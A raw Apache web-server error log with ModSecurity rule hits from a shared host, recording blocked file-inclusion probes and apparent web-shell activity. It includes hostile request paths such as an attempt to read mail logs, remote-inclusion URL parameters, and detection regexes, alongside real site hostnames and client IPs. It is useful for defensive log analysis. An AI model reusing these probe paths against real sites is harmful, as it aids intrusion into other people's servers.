[Mon May 11 14:43:55.042037 2026] [security2:error] [pid 1319953:tid 1319964] [client 216.73.216.110:45039] ModSecurity: Warning. Matched phrase "var/log/exim_mainlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_mainlog found within ARGS:filesrc: /var/log/exim_mainlog-20260426.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHPC-SQ-m-m0ukSSht3MAAAAUk"]
[Mon May 11 14:43:55.043390 2026] [security2:error] [pid 1319953:tid 1319964] [client 216.73.216.110:45039] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHPC-SQ-m-m0ukSSht3MAAAAUk"]
[Mon May 11 14:43:55.131264 2026] [security2:error] [pid 1319953:tid 1319964] [client 216.73.216.110:45039] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHPC-SQ-m-m0ukSSht3MAAAAUk"]
[Mon May 11 14:44:25.683869 2026] [security2:error] [pid 1320674:tid 1320695] [client 17.246.15.53:54104] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /wp-includes/sodium_compat/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agHPKaO9RdIr1DwxYR2HswAAAMU"]
[Mon May 11 14:44:25.684305 2026] [security2:error] [pid 1320674:tid 1320695] [client 17.246.15.53:54104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agHPKaO9RdIr1DwxYR2HswAAAMU"]
[Mon May 11 14:44:28.536612 2026] [security2:error] [pid 1320674:tid 1320695] [client 17.246.15.53:54104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agHPKaO9RdIr1DwxYR2HswAAAMU"]
[Mon May 11 14:44:28.797121 2026] [security2:error] [pid 1319998:tid 1320016] [client 17.246.19.103:44130] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /wp-includes/sodium_compat/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.labaujue.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agHPLKt2WtvoFr7xvGzJpAAAAJA"]
[Mon May 11 14:44:28.797396 2026] [security2:error] [pid 1319998:tid 1320016] [client 17.246.19.103:44130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agHPLKt2WtvoFr7xvGzJpAAAAJA"]
[Mon May 11 14:44:30.754498 2026] [security2:error] [pid 1319998:tid 1320016] [client 17.246.19.103:44130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agHPLKt2WtvoFr7xvGzJpAAAAJA"]
[Mon May 11 14:44:36.795248 2026] [authz_core:error] [pid 1319886:tid 1319897] [client 47.128.28.173:41838] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log
[Mon May 11 14:44:48.936956 2026] [security2:error] [pid 1319885:tid 1319893] [client 43.134.40.189:49688] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "mail.piregwan-genesis.com"] [uri "/"] [unique_id "agHPQFchVQ3tCn0m9OpNtgAAAQU"], referer: http://mail.piregwan-genesis.com
[Mon May 11 14:45:40.216799 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:40.469946 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:40.737195 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:41.017254 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:41.556844 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:41.807604 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:42.058065 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:42.390667 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:43.108309 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:43.386470 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:43.818325 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:44.066851 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:44.496007 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:44.746014 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/281/task/281/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/281/task/281/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/281/task/281/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/281/task/281/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/281/task/281/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/281/task/281/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:45:44.994433 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:45.284958 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:45.543430 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:46.038195 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:46.409834 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:46.700419 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:46.968778 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:47.222325 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:47.470705 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:47.723889 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:48.006844 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:48.281051 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:48.580317 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:48.837722 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:49.131953 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:49.380274 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:49.663090 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:49.913232 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:50.181364 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:50.439247 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:50.717261 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:50.965343 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:51.411320 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:51.669894 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:51.918439 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:52.182421 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:52.435209 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:52.684480 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:52.934355 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:53.378923 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:53.637958 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:53.948057 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:54.248217 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:54.497208 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:54.884677 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:55.193726 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:55.709828 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:55.979208 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:56.237125 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:56.605841 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:56.896867 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:57.146465 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:57.498906 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:57.747682 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:58.006188 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:58.339105 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:58.589009 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:59.716280 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:45:59.965955 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:00.341223 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:00.827200 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:01.077841 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:01.385913 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:01.658714 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:01.932687 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:02.533588 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:02.821310 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:03.401382 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:03.778095 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:04.041954 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:04.296741 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:04.554663 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:05.294972 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:05.568404 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:05.818505 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:06.203148 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:06.506510 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:06.776475 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:07.065615 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:07.314833 2026] [proxy_fcgi:error] [pid 1319953:tid 1319975] [client 74.249.238.26:31364] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:46:17.261285 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 216.73.216.110:58908] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/openid/error_log
[Mon May 11 14:46:31.343763 2026] [ssl:error] [pid 1319998:tid 1320014] [client 66.132.186.177:54460] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname gilours.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 14:46:40.429255 2026] [security2:error] [pid 1319953:tid 1319958] [client 45.8.255.122:60721] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHPsOSQ-m-m0ukSSht4JQAAAUM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 14:47:28.284848 2026] [security2:error] [pid 1320674:tid 1320696] [client 43.130.71.237:57778] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ixinabourgoin.fr"] [uri "/"] [unique_id "agHP4KO9RdIr1DwxYR2IxwAAAMY"]
[Mon May 11 14:47:34.690496 2026] [security2:error] [pid 1319998:tid 1320000] [client 103.3.220.124:7481] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://82.165.16.39 found within ARGS:url: http://82.165.16.39/index.php?title=User:AshtonMoreton0"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHP5qt2WtvoFr7xvGzKwAAAAIA"]
[Mon May 11 14:47:34.691914 2026] [security2:error] [pid 1319998:tid 1320000] [client 103.3.220.124:7481] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHP5qt2WtvoFr7xvGzKwAAAAIA"]
[Mon May 11 14:47:34.693403 2026] [security2:error] [pid 1319998:tid 1320000] [client 103.3.220.124:7481] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHP5qt2WtvoFr7xvGzKwAAAAIA"]
[Mon May 11 14:47:35.400043 2026] [security2:error] [pid 1319886:tid 1319923] [client 103.3.220.124:5277] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://82.165.16.39 found within ARGS:url: http://82.165.16.39/index.php?title=User:AshtonMoreton0"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHP56y-5-wpj6Sx56aPjQAAAA8"]
[Mon May 11 14:47:35.400947 2026] [security2:error] [pid 1319886:tid 1319923] [client 103.3.220.124:5277] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHP56y-5-wpj6Sx56aPjQAAAA8"]
[Mon May 11 14:47:35.402112 2026] [security2:error] [pid 1319886:tid 1319923] [client 103.3.220.124:5277] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHP56y-5-wpj6Sx56aPjQAAAA8"]
[Mon May 11 14:48:08.314257 2026] [authz_core:error] [pid 1319885:tid 1319935] [client 52.242.216.199:7277] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-patterns/error_log
[Mon May 11 14:48:24.664187 2026] [authz_core:error] [pid 1319886:tid 1319911] [client 216.73.216.110:23597] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/ZF2/error_log
PHP Warning:  filesize(): stat failed for /proc/102/task/102/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
